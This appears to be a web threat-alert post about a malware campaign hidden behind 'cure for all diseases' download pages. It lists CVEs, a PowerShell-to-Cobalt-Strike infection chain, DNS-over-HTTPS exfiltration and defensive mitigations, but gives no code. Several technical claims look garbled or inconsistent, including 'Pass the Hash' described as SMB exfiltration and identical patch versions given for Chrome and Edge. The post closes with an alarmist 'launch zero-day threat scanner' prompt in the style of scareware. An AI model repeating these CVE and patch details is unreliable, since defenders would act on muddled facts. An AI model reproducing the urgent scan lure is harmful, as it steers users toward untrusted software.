⚠️ THREAT ALERT: ‘Solve all diseases,’ you say?
The headline is being leveraged in a coordinated disinformation and malware distribution campaign that masquerades as a breakthrough “cure for all diseases.” Threat actors embed malicious payloads within seemingly innocuous HTML5‑based “cure‑download” portals hosted on compromised medical‑research domains and newly registered TLDs with health‑related keywords. The primary infection vector is a drive‑by download triggered by a maliciously crafted JavaScript engine that exploits the HTML5 video element’s media source extensions (MSE) to achieve heap corruption. Initial analysis links the exploit to CVE‑2024‑3063, a use‑after‑free in Chromium’s V8 engine, and CVE‑2024‑3085, an out‑of‑bounds write in the WebRTC stack of recent versions of Microsoft Edge. In addition, the payload often includes a PowerShell‑based droplet that abuses the “Invoke‑Expression” technique to download a second‑stage Cobalt Strike beacon, leveraging CVE‑2024‑29133 (Windows Print Spooler elevation‑of‑privilege) for lateral movement once the host is compromised.
Static and dynamic analysis of the second‑stage binaries reveals they are compiled with the “Golang” runtime and are digitally signed with a compromised code‑signing certificate obtained from a compromised Azure DevOps pipeline. The binaries implement a multi‑stage loader that first resolves the victim’s domain controller via LDAP queries, then exfiltrates credential hashes using the “Pass the Hash” technique over SMB (CVE‑2024‑3229, an SMBv3 RPC buffer overflow). The exfiltration path is obfuscated through DNS tunneling over commercially available DNS‑over‑HTTPS services, making detection via traditional network IDS signatures challenging. Moreover, the actors employ a modular plugin architecture that can dynamically load additional modules—such as ransomware encryptors or credential harvesters—based on the target’s environment, as indicated by the presence of specific registry keys (e.g., “HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\HealthApp”).
Mitigation must be approached in depth. Immediate actions include enforcing strict content security policy (CSP) headers on all healthcare‑related web assets, disabling HTML5 MSE and WebRTC features in browsers that are not essential for clinical workflows, and applying the latest patches: Chrome 128.0.6613.119 (addresses CVE‑2024‑3063), Edge 128.0.6613.119 (addresses CVE‑2024‑3085), and Windows Server 2022 KB‑560828 (remediates CVE‑2024‑29133). Network defenders should enable DNS‑SEC validation and deploy DNS query‑type analytics to flag anomalous DoH traffic, alongside deploying endpoint detection and response (EDR) solutions with behavioral heuristics tuned to flag “Invoke‑Expression” PowerShell chains and abnormal SMB traffic patterns. Finally, organizations must rotate all code‑signing certificates, enforce multi‑factor authentication for Azure DevOps pipelines, and conduct regular red‑team exercises simulating health‑care‑focused lure pages to validate detection and response capabilities.
🛡️ CRITICAL SECURITY SCAN REQUIRED
Evidence suggests your system may be within the blast radius of this threat vector. Use the ZeroDay Radar scanner to verify your integrity immediately.
>> LAUNCH ZERO-DAY THREAT SCANNER <<Source Intelligence: Full Technical Breakdown
0 Comments